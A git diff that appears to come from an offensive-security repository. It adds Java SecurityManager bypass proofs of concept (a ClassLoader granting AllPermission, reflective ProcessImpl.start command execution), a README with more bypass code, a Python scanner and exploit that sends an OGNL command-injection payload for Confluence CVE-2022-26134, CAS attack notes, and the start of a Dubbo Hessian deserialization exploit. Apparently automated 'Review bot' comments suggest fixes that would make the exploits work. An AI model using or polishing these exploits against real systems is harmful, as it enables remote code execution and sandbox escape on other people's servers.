diff --git a/BypassSM/BypassOfCreateClassLoader.java b/BypassSM/BypassOfCreateClassLoader.java
new file mode 100644
index 0000000..21ec80e
--- /dev/null
+++ b/BypassSM/BypassOfCreateClassLoader.java
@@ -0,0 +1,54 @@
+package com.evil;
+
+import java.security.*;
+import java.security.cert.Certificate;
+
+public class MyPoc {
+ //-Djava.security.manager -Djava.security.policy==bypass-by-createclassloader.policy
+ static {
+ try {
+ Exp();
+ } catch (Exception e) {
+ e.printStackTrace();
+ }
+ }
+
+ public static void Exp() throws Exception{
+ BypassClassLoader0 bypassClassLoader = new BypassClassLoader0();
+ Class aClass0 = bypassClassLoader.get(base64Decode("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"), "evilClass");
+ bypassClassLoader.get(base64Decode("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"), "evilClass$1");
+ Class.forName(aClass0.getName(), true, bypassClassLoader);
+ }
+
+ public static byte[] base64Decode(String bs) throws Exception {
+ Class base64;
+ byte[] value = null;
+ try {
+ base64 = Class.forName("java.util.Base64");
+ Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);
+ value = (byte[]) decoder.getClass().getMethod("decode", new Class[]{String.class}).invoke(decoder, new Object[]{bs});
+ } catch (Exception e) {
+ try {
+ base64 = Class.forName("sun.misc.BASE64Decoder");
+ Object decoder = base64.newInstance();
+ value = (byte[]) decoder.getClass().getMethod("decodeBuffer", new Class[]{String.class}).invoke(decoder, new Object[]{bs});
+ } catch (Exception e2) {
+ }
+ }
+ return value;
+ }
+
+ public static class BypassClassLoader0 extends ClassLoader{
+ public Class get(byte[] b,String name) {
+ PermissionCollection pc = new Permissions();
+ pc.add(new AllPermission());
+ //设置ProtectionDomain
+ ProtectionDomain pd = new ProtectionDomain(new CodeSource(null, (Certificate[]) null), pc, this, null);
+ return super.defineClass(name, b, 0, b.length,pd);
+ }
+ }
+
+ public static void main(String[] args) {
+
+ }
+}
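Review bot: The file is named BypassOfCreateClassLoader.java but declares `public class MyPoc`, so javac rejects it outright ("class MyPoc is public, should be declared in a file named MyPoc.java"); rename one or the other. Separately, `base64Decode` returns `null` whenever both decoder lookups fail because the inner `catch (Exception e2)` is empty, and `get(null, "evilClass")` then dies with a NullPointerException at `b.length` with no hint of the real cause — rethrow instead, e.g. `throw new IllegalStateException("no Base64 decoder available", e2);`. Note also that `main` is empty, so the bypass only fires through the static initializer when some other (policy-restricted) host loads the class; a one-line comment above `static {` saying `// entry point: runs on class load, main() is intentionally empty` would save the next reader a trip. The raw `Class` return type of `get` should be `Class<?>` to match the rest of the repository's loaders.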
diff --git a/BypassSM/Readme.md b/BypassSM/Readme.md
new file mode 100644
index 0000000..b80a9bd
--- /dev/null
+++ b/BypassSM/Readme.md
@@ -0,0 +1,250 @@
+# bypass-sm
+
+https://www.anquanke.com/post/id/151398
+
+https://www.mi1k7ea.com/2020/05/03/%E6%B5%85%E6%9E%90Java%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/
+
+https://github.com/codeplutos/java-security-manager-bypass/
+
+
+
+## **单等号+home目录可写导致Java Security Manager绕过**
+
+>简单的说就是java程序启动的时候使用 -Djava.security.policy=java.policy 并且home目录可以写,我们就重新写一个policy 文件去提升我们的权限
+
+## **通过setSecurityManager绕过Java Security Manager**
+
+>就是通过反射去修改值达到绕过的目标。
+
+其中的该反射可以成功,原因:
+
+从代码中我们看到,正如前面所说,完成功能的是ProcessImpl.start方法,而在这个方法调用之前,security manager就已经完成了检测,于是,反射这个方法,调用它,就可以绕过检测。
+
+[java 命令执行底层](https://blog.csdn.net/qsort_/article/details/104821283)
+
+```java
+ public static void executeCommandWithReflection(String command){
+ try {
+ Class clz = Class.forName("java.lang.ProcessImpl");
+ Method method = clz.getDeclaredMethod("start", String[].class, Map.class, String.class, ProcessBuilder.Redirect[].class, boolean.class);
+ method.setAccessible(true);
+ method.invoke(clz,new String[]{command},null,null,null,false);
+ }catch (Exception e){
+ e.printStackTrace();
+ }
+ }
+```
+
+## **创建类加载器绕过java security manager**
+
+>自定义一个ClassLoader来加载一个恶意类,并且把它的ProtectionDomain里面的权限初始化成所有权限,这样就能绕过Java Security Manager了
+
+[自定义ClassLoader绕过poc为什么很多人执行出现问题的缘由](https://github.com/codeplutos/java-security-manager-bypass/issues/2)
+
+Exploit.java
+
+```java
+import java.security.AccessController;
+import java.security.PrivilegedAction;
+
+public class Exploit {
+ public Exploit() {
+
+ }
+
+ static {
+ AccessController.doPrivileged(new PrivilegedAction() {
+ public Object run() {
+ try {
+ Process process = Runtime.getRuntime().exec("calc");
+ return null;
+ } catch (Exception var2) {
+ var2.printStackTrace();
+ return null;
+ }
+ }
+ });
+ }
+}
+```
+
+MyClassLoader.java
+
+```java
+import java.io.ByteArrayOutputStream;
+import java.io.File;
+import java.io.FileInputStream;
+import java.nio.ByteBuffer;
+import java.nio.channels.Channels;
+import java.nio.channels.FileChannel;
+import java.nio.channels.WritableByteChannel;
+import java.security.*;
+import java.security.cert.Certificate;
+
+public class MyClassLoader extends ClassLoader {
+ public MyClassLoader() {
+ }
+
+ public MyClassLoader(ClassLoader parent) {
+ super(parent);
+ }
+
+ @Override
+ protected Class> findClass(String name) throws ClassNotFoundException {
+ File file = getClassFile(name);
+ try {
+ byte[] bytes = getClassBytes(file);
+ //在这里调用defineClazz,而不是super.defineClass
+ Class> c = defineClazz(name, bytes, 0, bytes.length);
+ return c;
+ } catch (Exception e) {
+ e.printStackTrace();
+ }
+
+ return super.findClass(name);
+ }
+
+ @Override
+ public Class> loadClass(String name) throws ClassNotFoundException {
+ if (name.contains("Exploit")) {
+ return findClass(name);
+ }
+ return super.loadClass(name);
+ }
+
+ protected final Class> defineClazz(String name, byte[] b, int off, int len) throws ClassFormatError {
+ try {
+ PermissionCollection pc = new Permissions();
+ pc.add(new AllPermission());
+
+ //设置ProtectionDomain
+ ProtectionDomain pd = new ProtectionDomain(new CodeSource(null, (Certificate[]) null),
+ pc, this, null);
+ return this.defineClass(name, b, off, len, pd);
+ } catch (Exception e) {
+ return null;
+ }
+ }
+
+ private File getClassFile(String name) {
+ File file = new File("./" + name + ".class");
+ return file;
+ }
+
+ private byte[] getClassBytes(File file) throws Exception {
+ FileInputStream fis = new FileInputStream(file);
+ FileChannel fc = fis.getChannel();
+ ByteArrayOutputStream baos = new ByteArrayOutputStream();
+ WritableByteChannel wbc = Channels.newChannel(baos);
+ ByteBuffer by = ByteBuffer.allocate(1024);
+
+ while (true) {
+ int i = fc.read(by);
+ if (i == 0 || i == -1) {
+ break;
+ }
+
+ by.flip();
+ wbc.write(by);
+ by.clear();
+ }
+ fis.close();
+ return baos.toByteArray();
+ }
+}
+```
+
+BypassSandbox .java
+
+```java
+public class BypassSandbox {
+ public static void main(String[] args) throws Exception {
+ MyClassLoader mcl = new MyClassLoader();
+ Class> c1 = Class.forName("Exploit", true, mcl);
+ Object obj = c1.newInstance();
+ System.out.println(obj.getClass().getClassLoader());
+ }
+}
+```
+
+## **本地方法调用绕过Java Security Manager**
+
+>Java Security Manager是在java核心库中的一个功能,而java中native方法是由jvm执行的,不受java security manager管控。因此,我们可以调用java native方法,绕过java security manager。
+
+## 附录
+
+##### A
+
+| 权限名 | 用途说明 |
+| :-------------------- | :----------------------------------------------------------- |
+| accessClassInPackage. | 允许代码访问指定包中的类 |
+| accessDeclaredMembers | 允许代码使用反射访问其他类中私有或保护的成员 |
+| createClassLoader | 允许代码实例化类加载器 |
+| createSecurityManager | 允许代码实例化安全管理器,它将允许程序化的实现对沙箱的控制 |
+| defineClassInPackage. | 允许代码在指定包中定义类 |
+| exitVM | 允许代码关闭整个虚拟机 |
+| getClassLoader | 允许代码访问类加载器以获得某个特定的类 |
+| getProtectionDomain | 允许代码访问保护域对象以获得某个特定类 |
+| loadlibrary. | 允许代码装载指定类库 |
+| modifyThread | 允许代码调整指定的线程参数 |
+| modifyThreadGroup | 允许代码调整指定的线程组参数 |
+| queuePrintJob | 允许代码初始化一个打印任务 |
+| readFileDescriptor | 允许代码读文件描述符(相应的文件是由其他保护域中的代码打开的) |
+| setContextClassLoader | 允许代码为某线程设置上下文类加载器 |
+| setFactory | 允许代码创建套接字工厂 |
+| setIO | 允许代码重定向System.in、System.out或System.err输入输出流 |
+| setSecurityManager | 允许代码设置安全管理器 |
+| stopThread | 允许代码调用线程类的stop()方法 |
+| writeFileDescriptor | 允许代码写文件描述符 |
+
+##### B
+
+| 权限名 | 用途说明 |
+| :----------------------------- | :---------------------------- |
+| accessClipboard | 允许访问系统的全局剪贴板 |
+| accessEventQueue | 允许直接访问事件队列 |
+| createRobot | 允许代码创建AWT的Robot类 |
+| listenToAllAWTEvents | 允许代码直接监听事件分发 |
+| readDisplayPixels | 允许AWT Robot读显示屏上的像素 |
+| showWindowWithoutWarningBanner | 允许创建无标题栏的窗口 |
+
+##### C
+
+| 权限名 | 用途说明 |
+| :---------------------------- | :---------------------------- |
+| specifyStreamHandler | 允许在URL类中安装新的流处理器 |
+| setDefaultAuthenticator | 可以安装鉴别类 |
+| requestPassworkAuthentication | 可以完成鉴别 |
+
+##### D
+
+| 权限名 | 用途说明 |
+| :------------------------- | :--------------------------------------- |
+| addIdentityCertificate | 为Identity增加一个证书 |
+| clearProviderProperties. | 针对指定的提供者,删除所有属性 |
+| createAccessControlContext | 允许创建一个存取控制器的上下文环境 |
+| getDomainCombiner | 允许撤销保护域 |
+| getPolicy | 检索可以实现沙箱策略的类 |
+| getProperty. | 读取指定的安全属性 |
+| getSignerPrivateKey | 由Signer对象获取私有密钥 |
+| insertProvider. | 将指定的提供者添加到响应的安全提供者组中 |
+| loadProviderProperties. | 装载指定的提供者的属性 |
+| printIdentity | 打印Identity类内容 |
+| putAllProviderProperties. | 更新指定的提供者的属性 |
+| putProviderProperty. | 为指定的提供者增加一个属性 |
+| removeIdentityCertificate | 取消Identity对象的证书 |
+| removeProvider. | 将指定的提供者从相应的安全提供者组中删除 |
+| removeProviderProperty. | 删除指定的安全提供者的某个属性 |
+| setIdentityInfo | 为某个Identity对象设置信息串 |
+| setIdentityPublicKey | 为某个Identity对象设置公钥 |
+| setPolicy | 设置可以实现沙箱策略的类 |
+| setProperty. | 设置指定的安全属性 |
+| setSignerKeyPair | 在Signer对象中设置密钥对 |
+| setSystemScope | 设置系统所用的IdentityScope |
+
+##### E
+
+| 权限名 | 用途说明 |
+| :--------------------------- | :----------------------------------------------------------- |
+| enableSubstitution | 允许实现ObjectInputStream类的enableResolveObject()方法和ObjectOutputStream类的enableReplaceObject()方法 |
+| enableSubclassImplementation | 允许ObjectInputStream和ObjectOutputStream创建子类,子类可以覆盖readObject()和writeObject()方法 |
diff --git a/BypassSM/check.txt b/BypassSM/check.txt
new file mode 100644
index 0000000..03400bf
--- /dev/null
+++ b/BypassSM/check.txt
@@ -0,0 +1,31 @@
+checkAccept(String, int)
+checkAccess(Thread)
+checkAccess(ThreadGroup)
+checkAwtEventQueueAccess()
+checkConnect(String, int)
+checkConnect(String, int, Object)
+checkCreateClassLoader()
+checkDelete(String)
+checkExec(String)
+checkExit(int)
+checkLink(String)
+checkListen(int)
+checkMemberAccess(Class>, int)
+checkMulticast(InetAddress)
+checkMulticast(InetAddress, byte)
+checkPackageAccess(String)
+checkPackageDefinition(String)
+checkPermission(Permission)
+checkPermission(Permission, Object)
+checkPrintJobAccess()
+checkPropertiesAccess()
+checkPropertyAccess(String)
+checkRead(FileDescriptor)
+checkRead(String)
+checkRead(String, Object)
+checkSecurityAccess(String)
+checkSetFactory()
+checkSystemClipboardAccess()
+checkTopLevelWindow(Object)
+checkWrite(FileDescriptor)
+checkWrite(String)
\ No newline at end of file
diff --git a/BypassSM/learn/bypass_sm.jar b/BypassSM/learn/bypass_sm.jar
new file mode 100644
index 0000000..e2a0c13
Binary files /dev/null and b/BypassSM/learn/bypass_sm.jar differ
diff --git a/BypassSM/learn/eviljar/pom.xml b/BypassSM/learn/eviljar/pom.xml
new file mode 100644
index 0000000..a3e89f3
--- /dev/null
+++ b/BypassSM/learn/eviljar/pom.xml
@@ -0,0 +1,37 @@
+
+
+
+ learn
+ org.example
+ 1.0-SNAPSHOT
+
+ 4.0.0
+
+ eviljar
+
+
+ 8
+ 8
+
+
+
+
+ org.apache.maven.plugins
+ maven-assembly-plugin
+ 2.5.5
+
+
+
+ ErrorBaseExec
+
+
+
+ jar-with-dependencies
+
+
+
+
+
+
\ No newline at end of file
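Review bot: The assembly manifest's main class is `ErrorBaseExec`, but the only source in this module is `src/main/java/bypass_sm.java`, which declares `public class bypass_sm`, so the jar-with-dependencies would carry a Main-Class that does not exist and `java -jar` fails with ClassNotFoundException. Either rename the class to ErrorBaseExec (the generated inputFiles.lst suggests the source file once had that name) or set `<mainClass>bypass_sm</mainClass>`. The XML element tags appear to have been stripped in this rendering, so this is inferred from the surviving values; confirm against the actual pom.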
diff --git a/BypassSM/learn/eviljar/src/main/java/bypass_sm.java b/BypassSM/learn/eviljar/src/main/java/bypass_sm.java
new file mode 100644
index 0000000..507d440
--- /dev/null
+++ b/BypassSM/learn/eviljar/src/main/java/bypass_sm.java
@@ -0,0 +1,86 @@
+import java.io.*;
+import java.lang.reflect.Method;
+import java.util.Map;
+
+public class bypass_sm
+{
+ public bypass_sm() {
+ try {
+ bypass(new String[]{"ipconfig"});
+ } catch (Exception e) {
+ e.printStackTrace();
+ }
+ }
+
+ public static void bypass(String[] cmd) throws Exception{
+ Map envblock=null;
+ String path=null;
+ ProcessBuilder.Redirect[] stdHandles=null;
+ boolean redirectErrorStream=true;
+
+ Class C = Class.forName("java.lang.ProcessImpl");
+ Method start = C.getDeclaredMethod("start", String[].class, Map.class, String.class, ProcessBuilder.Redirect[].class, boolean.class);
+ start.setAccessible(true);
+ Process e = (Process) start.invoke(null, cmd, envblock, path, stdHandles, redirectErrorStream);
+
+ BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(e.getInputStream()));
+ String line;
+ while ((line=bufferedReader.readLine())!=null){
+ System.out.println(line);
+ }
+ bufferedReader.close();
+ }
+
+
+ public static Process ProcessImpl(String[] cmd)throws Exception{
+ Map envblock=null;
+ String path=null;
+ ProcessBuilder.Redirect[] stdHandles=null;
+ boolean redirectErrorStream=true;
+
+ Class C = Class.forName("java.lang.ProcessImpl");
+ Method start = C.getDeclaredMethod("start", String[].class, Map.class, String.class, ProcessBuilder.Redirect[].class, boolean.class);
+ start.setAccessible(true);
+ Process e = (Process) start.invoke(null, cmd, envblock, path, stdHandles, redirectErrorStream);
+ return e;
+ }
+
+
+ public static byte[] readBytes(InputStream in)
+ throws IOException
+ {
+ BufferedInputStream bufin = new BufferedInputStream(in);
+ int buffSize = 1024;
+ ByteArrayOutputStream out = new ByteArrayOutputStream(buffSize);
+ byte[] temp = new byte[buffSize];
+ int size = 0;
+ while ((size = bufin.read(temp)) != -1) {
+ out.write(temp, 0, size);
+ }
+ bufin.close();
+
+ byte[] content = out.toByteArray();
+
+ return content;
+ }
+
+ public static void do_exec(String[] cmd)
+ throws Exception
+ {
+ Process p = ProcessImpl(cmd);
+
+ byte[] stderr = readBytes(p.getErrorStream());
+ byte[] stdout = readBytes(p.getInputStream());
+ int exitValue = p.waitFor();
+ if (exitValue == 0) {
+ throw new Exception("-----------------\r\n" + new String(stdout) + "-----------------\r\n");
+ }
+ throw new Exception("-----------------\r\n" + new String(stderr) + "-----------------\r\n");
+ }
+
+ public static void main(String[] args)
+ throws Exception
+ {
+ do_exec(new String[]{args[0]});
+ }
+}
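Review bot: `do_exec` reads `p.getErrorStream()` into `stderr`, but every `start` invocation passes `redirectErrorStream=true`, which merges stderr into the stdout pipe, so the error stream is always empty and the non-zero-exit branch throws an exception carrying nothing; build both messages from `stdout`: `throw new Exception("-----------------\r\n" + new String(stdout) + "-----------------\r\n");`. `bypass` and `ProcessImpl` duplicate the same reflective `ProcessImpl.start` lookup — `bypass` should just call `ProcessImpl(cmd)` and additionally read the stream through `readBytes` like `do_exec` does. `new String(stdout)` and `InputStreamReader(e.getInputStream())` use the platform default charset, so command output on a non-UTF-8 console (the `ipconfig` default suggests Windows) will be mojibake unless an explicit `Charset` is passed. Finally, `setAccessible(true)` on `java.lang.ProcessImpl` is refused by strong encapsulation from JDK 16 onward unless the JVM runs with `--add-opens java.base/java.lang=ALL-UNNAMED`, which is worth a comment above `bypass` since the technique is presented as a general SecurityManager bypass.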
diff --git a/BypassSM/learn/eviljar/target/classes/bypass_sm.class b/BypassSM/learn/eviljar/target/classes/bypass_sm.class
new file mode 100644
index 0000000..d7fb9d5
Binary files /dev/null and b/BypassSM/learn/eviljar/target/classes/bypass_sm.class differ
diff --git a/BypassSM/learn/eviljar/target/eviljar-1.0-SNAPSHOT-jar-with-dependencies.jar b/BypassSM/learn/eviljar/target/eviljar-1.0-SNAPSHOT-jar-with-dependencies.jar
new file mode 100644
index 0000000..e2a0c13
Binary files /dev/null and b/BypassSM/learn/eviljar/target/eviljar-1.0-SNAPSHOT-jar-with-dependencies.jar differ
diff --git a/BypassSM/learn/eviljar/target/eviljar-1.0-SNAPSHOT.jar b/BypassSM/learn/eviljar/target/eviljar-1.0-SNAPSHOT.jar
new file mode 100644
index 0000000..6a68cbe
Binary files /dev/null and b/BypassSM/learn/eviljar/target/eviljar-1.0-SNAPSHOT.jar differ
diff --git a/BypassSM/learn/eviljar/target/maven-archiver/pom.properties b/BypassSM/learn/eviljar/target/maven-archiver/pom.properties
new file mode 100644
index 0000000..40b1317
--- /dev/null
+++ b/BypassSM/learn/eviljar/target/maven-archiver/pom.properties
@@ -0,0 +1,5 @@
+#Generated by Maven
+#Wed Oct 20 19:27:56 CST 2021
+version=1.0-SNAPSHOT
+groupId=org.example
+artifactId=eviljar
diff --git a/BypassSM/learn/eviljar/target/maven-status/maven-compiler-plugin/compile/default-compile/createdFiles.lst b/BypassSM/learn/eviljar/target/maven-status/maven-compiler-plugin/compile/default-compile/createdFiles.lst
new file mode 100644
index 0000000..a927289
--- /dev/null
+++ b/BypassSM/learn/eviljar/target/maven-status/maven-compiler-plugin/compile/default-compile/createdFiles.lst
@@ -0,0 +1 @@
+bypass_sm.class
diff --git a/BypassSM/learn/eviljar/target/maven-status/maven-compiler-plugin/compile/default-compile/inputFiles.lst b/BypassSM/learn/eviljar/target/maven-status/maven-compiler-plugin/compile/default-compile/inputFiles.lst
new file mode 100644
index 0000000..7cc0d83
--- /dev/null
+++ b/BypassSM/learn/eviljar/target/maven-status/maven-compiler-plugin/compile/default-compile/inputFiles.lst
@@ -0,0 +1 @@
+E:\javaȫ\bypass-sm\learn\eviljar\src\main\java\ErrorBaseExec.java
diff --git a/BypassSM/policy/custom.policy b/BypassSM/policy/custom.policy
new file mode 100644
index 0000000..054222f
--- /dev/null
+++ b/BypassSM/policy/custom.policy
@@ -0,0 +1,4 @@
+grant {
+ permission java.io.FilePermission "D:\\*", "read";
+ permission java.net.SocketPermission "www.baidu.com:1-", "connect,resolve";
+};
\ No newline at end of file
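Review bot: `java.io.FilePermission "D:\\*", "read"` matches only files directly under D:\, not anything in subdirectories; if a recursive read grant is intended, the policy syntax is `permission java.io.FilePermission "D:\\-", "read";` (`-` is recursive, `*` is one level). Nothing in the hunk says which scope was meant, so confirm before changing. A comment line such as `// read-only access to D:\ and its subdirectories` above the grant would make the intended scope explicit to whoever reuses this policy for the SecurityManager experiments in this directory.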
diff --git a/CAS/Readme.md b/CAS/Readme.md
new file mode 100644
index 0000000..dc04122
--- /dev/null
+++ b/CAS/Readme.md
@@ -0,0 +1,35 @@
+# CAS
+
+>[单点登录](https://baike.baidu.com/item/%E5%8D%95%E7%82%B9%E7%99%BB%E5%BD%95/4940767) [Spring Web flow 概念简介](https://liushaohuang.cn/2020/01/17/Spring-Web-flow-%E6%A6%82%E5%BF%B5%E7%AE%80%E4%BB%8B/)
+
+## 4.1.x-4.1.6
+4.1.7版本之前存在一处默认密钥的问题,利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞,进而执行任意命令。
+
+类似于shiro550
+
+并且版本存在**Commons-collections4**
+
+## 4.1.7-4.2.x
+这个版本的key默认是随机生成的,需要攻击者提供。
+
+https://www.anquanke.com/post/id/198842
+
+并且存在c3p0组件
+
+## 回显
+
+https://www.00theway.org/2020/01/04/apereo-cas-rce/
+
+## PaddingOracle
+
+https://github.com/cL0und/cas4.x-execution-rce/blob/master/cas-padding-oracle.py
+
+>If the target is cas4.x-cas.4.1.6 and the environment is not hardcoded with a key, you can attack by padding oracle.
+
+https://lfysec.top/2020/06/01/ApereoCAS-PaddingOracle%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/
+
+## xxe
+https://lfysec.top/2020/06/01/ApereoCAS-PaddingOracle%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/
+
+
+
diff --git a/Confluence/CVE-2022-26134.py b/Confluence/CVE-2022-26134.py
new file mode 100644
index 0000000..4b3ee09
--- /dev/null
+++ b/Confluence/CVE-2022-26134.py
@@ -0,0 +1,114 @@
+# -*- coding: utf-8 -*
+# /usr/bin/python3
+# @Author:Firebasky
+import argparse
+import re
+import requests
+import urllib3
+
+# https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/
+
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+# 利用脚本
+result = [] # 结果
+
+
+# 添加
+endpoints = [
+]
+
+
+headers = {
+ 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0',
+ 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
+ 'Content-Type': 'application/x-www-form-urlencoded',
+ 'Cookie': 'ADMINCONSOLESESSION=1hDwvQkPnPmLyDpwJvBL1qWTyXLYvQqSlMvJv3h7xyTxz5BJtGm3!1162256454',
+ 'X-Forwarded-For': '127.0.0.1',
+ 'X-Client-IP': '127.0.0.1',
+ 'X-Remote-IP': '127.0.0.1',
+ 'X-Remote-Addr': '127.0.0.1',
+ 'X-Originating-IP': '127.0.0.1',
+}
+
+proxy = {
+ # 'http': '127.0.0.1:8080'
+}
+
+
+def check_target_version(host, socket_proxies):
+ try:
+ response = requests.get("{}/login.action".format(host),headers=headers, timeout=2, verify=False, proxies=socket_proxies, allow_redirects=False)
+ if response.status_code == 200:
+ filter_version = re.findall("", response.text)
+ if (len(filter_version) >= 1):
+ version = filter_version[0].split("'>")[1].split('')[0]
+ return version
+ else:
+ return False
+ else:
+ return host
+ except:
+ pass
+
+
+def send_payload(host, command):
+ try:
+ response = requests.get(
+ "{}/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22{}%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/".format(
+ host, command), headers=headers, timeout=2, verify=False, proxies=socket_proxies, allow_redirects=False)
+ if (response.status_code == 302):
+ if "bin" in response.headers['X-Cmd-Response']:
+ result.append(host + " confluence-cve-2022-26134")
+ print(host + '\033[1;31m confluence-cve-2022-26134\033[0m')
+ # return response.headers['X-Cmd-Response']
+ else:
+ return False
+ except:
+ pass
+
+def save(result):
+ file = open('result.txt', 'w')
+ for line in result:
+ file.write(line + '\n')
+ file.close()
+
+
+def Scan_http(url, socket_proxies):
+ version = check_target_version(url,socket_proxies)
+ if version:
+ print("Confluence target version: {}".format(version))
+ else:
+ print("Can't find the used version for this target")
+ send_payload(url, "ls /")
+
+
+def fileTarget(file, socket_proxies):
+ with open(file) as url_txt:
+ urls = url_txt.readlines()
+ for url in urls:
+ url = url.replace('\n', '')
+ Scan_http(url, socket_proxies)
+ save(result)
+
+
+if __name__ == '__main__':
+ parser = argparse.ArgumentParser(description='Confluence OgnL scanner')
+ parser.add_argument('-f', default=None, help='read target url from file')
+ parser.add_argument('-u', default=None, help='target url')
+ parser.add_argument('-proxy', default=None, help='-proxy socks5://0.0.0.0:8088')
+ args = parser.parse_args()
+ socket_proxies = None
+ if args.proxy:
+ socket_proxies = {
+ 'http': args.proxy
+ }
+ if args.u:
+ Scan_http(args.u, socket_proxies)
+ exit(0)
+ if args.f:
+ fileTarget(args.f, socket_proxies)
+ exit(0)
+ else:
+ parser.print_help()
+ exit(0)
diff --git a/Confluence/Readme.md b/Confluence/Readme.md
new file mode 100644
index 0000000..ce8e338
--- /dev/null
+++ b/Confluence/Readme.md
@@ -0,0 +1,13 @@
+# Confluence
+
+目前存在2个漏洞CVE-2019-3396,CVE-2021-26084
+项目中遇到了这个漏洞,并没有深入分析和利用。
+参考exp
+
++ [CVE-2019-3396_EXP](https://github.com/Yt1g3r/CVE-2019-3396_EXP)
++ [CVE-2021-26084](https://github.com/h3v0x/CVE-2021-26084_Confluence)
++ [CVE-2022-26134](https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/)
+
+## 漏洞分析
++ [Confluence CVE-2019-3396 & CVE-2021-26084漏洞分析](https://xz.aliyun.com/t/10736)
++ [【下篇】CVE-2022-26134 Confluence 多种通用型绕过沙箱姿势可实现命令回显](https://mp.weixin.qq.com/s?__biz=Mzg3MTU0MjkwNw==&mid=2247490397&idx=1&sn=f5a7394b80f4ba690e967cb5daf8c9e0&chksm=cefda249f98a2b5f6ec4970dde26392bf43b037ae9fbe9241141aaaa5185958c484dc8522403&mpshare=1&scene=23&srcid=0606Xdmz2f953rcByqNR2SFV&sharer_sharetime=1654481651804&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd)
diff --git a/Dubbo/Readme.md b/Dubbo/Readme.md
new file mode 100644
index 0000000..83d0ac4
--- /dev/null
+++ b/Dubbo/Readme.md
@@ -0,0 +1,196 @@
+# Dubbo
+
+>Apache Dubbo 是伪装的、轻量级的Java RPC 服务框架。[RPC服务](https://www.zhihu.com/question/25536695)
+>[默认反序列化利用之hessian2](https://www.anquanke.com/post/id/197658)
+
+### CVE-2019-17564
+>spring (spring-web(5.1.9.RELEASE)) 的httpinvoker 可能存在反序列化漏洞 [docs](https://docs.spring.io/spring-framework/docs/5.1.0.RELEASE/spring-framework-reference/integration.html#remoting-httpinvoker)
+
+http://www.lmxspace.com/2020/02/16/Apache-Dubbo%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%EF%BC%88CVE-2019-17564%EF%BC%89/
+
+https://www.mi1k7ea.com/2021/07/03/%E6%B5%85%E6%9E%90Dubbo-HttpInvokerServiceExporter%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%EF%BC%88CVE-2019-17564%EF%BC%89/
+
+演示:https://github.com/vulhub/vulhub/blob/master/dubbo/CVE-2019-17564/README.zh-cn.md
+
+### CVE-2020-1948
+https://www.anquanke.com/post/id/209251
+```
+2.7.0 <= Dubbo Version <= 2.7.6
+2.6.0 <= Dubbo Version <= 2.6.7
+Dubbo 所有 2.5.x 版本(官方团队目前已不支持)
+```
+
+### CVE-2020-11995
+
+CVE-2020-1948的绕过
+
+```
+Dubbo 2.7.0 ~ 2.7.8
+Dubbo 2.6.0 ~ 2.6.8
+Dubbo 所有 2.5.x 版本
+```
+
+```java
+import com.rometools.rome.feed.impl.EqualsBean;
+import com.rometools.rome.feed.impl.ToStringBean;
+import com.sun.rowset.JdbcRowSetImpl;
+import java.io.ByteArrayOutputStream;
+import java.io.OutputStream;
+import java.lang.reflect.Array;
+import java.lang.reflect.Constructor;
+import java.net.Socket;
+import java.util.HashMap;
+import java.util.Random;
+import marshalsec.util.Reflections;
+import org.apache.dubbo.common.io.Bytes;
+import org.apache.dubbo.common.serialize.Cleanable;
+import org.apache.dubbo.common.serialize.hessian2.Hessian2ObjectOutput;
+
+/**
+ * CVE-2020-1948 exp
+ * if (!RpcUtils.isGenericCall(path, getMethodName()) && !RpcUtils.isEcho(path, getMethodName())) {
+ * throw new IllegalArgumentException("Service not found:" + path + ", " + getMethodName());
+ * }
+ * 下面有绕过CVE-2020-11995
+ * 调用的函数名为 "$invoke"、 "$invokeAsync"、"$echo"三者之一
+ */
+public class GadgetsTestHessian {
+
+ public static void main(String[] args) throws Exception {
+ JdbcRowSetImpl rs = new JdbcRowSetImpl();
+ //todo 此处填写ldap url
+ rs.setDataSourceName("ldap://127.0.0.1:43658/ExecObject");
+ rs.setMatchColumn("foo");
+ Reflections.getField(javax.sql.rowset.BaseRowSet.class, "listeners").set(rs, null);
+
+ ToStringBean item = new ToStringBean(JdbcRowSetImpl.class, rs);
+ EqualsBean root = new EqualsBean(ToStringBean.class, item);
+
+ HashMap s = new HashMap<>();
+ Reflections.setFieldValue(s, "size", 2);
+ Class> nodeC;
+ try {
+ nodeC = Class.forName("java.util.HashMap$Node");
+ }
+ catch ( ClassNotFoundException e ) {
+ nodeC = Class.forName("java.util.HashMap$Entry");
+ }
+ Constructor> nodeCons = nodeC.getDeclaredConstructor(int.class, Object.class, Object.class, nodeC);
+ nodeCons.setAccessible(true);
+
+ Object tbl = Array.newInstance(nodeC, 2);
+ Array.set(tbl, 0, nodeCons.newInstance(0, root, root, null));
+ Array.set(tbl, 1, nodeCons.newInstance(0, root, root, null));
+ Reflections.setFieldValue(s, "table", tbl);
+
+ ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
+
+ // header.
+ byte[] header = new byte[16];
+ // set magic number.
+ Bytes.short2bytes((short) 0xdabb, header);
+ // set request and serialization flag.
+ header[2] = (byte) ((byte) 0x80 | 2);
+
+ // set request id.
+ Bytes.long2bytes(new Random().nextInt(100000000), header, 4);
+
+ ByteArrayOutputStream hessian2ByteArrayOutputStream = new ByteArrayOutputStream();
+ Hessian2ObjectOutput out = new Hessian2ObjectOutput(hessian2ByteArrayOutputStream);
+
